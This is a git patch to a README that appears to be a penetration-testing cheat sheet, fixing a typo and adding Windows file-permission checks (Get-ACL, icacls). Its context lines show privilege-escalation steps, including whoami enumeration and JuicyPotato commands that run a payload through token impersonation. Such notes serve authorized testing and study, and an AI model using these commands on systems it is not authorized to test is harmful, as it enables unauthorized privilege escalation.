From 986b8ca527fc8035347ef2169c4902aad90301e5 Mon Sep 17 00:00:00 2001 From: Joe Totes <59018247+Totes5706@users.noreply.github.com> Date: Thu, 20 Oct 2022 14:27:05 -0400 Subject: [PATCH] Update README.md --- README.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 84f0089..f5144be 100644 --- a/README.md +++ b/README.md @@ -1029,11 +1029,15 @@ net user {USERNAME} # Check UAC level whoami /groups -# Check Privledges for Impersonation +# Check Privileges for Impersonation whoami /priv JuicyPotato.exe -t * -p {run.exe} -l 8003 JuicyPotato.exe -t * -p {run.exe} -l 8003 -c {CLSID} +# Check File Permissions +Get-ACL {FILE or DIR} | fl +icacls {FILE} + # Powershell cmd /c "JuicyPotato.exe -t * -p run.exe -l 8003 -c {CLSID}"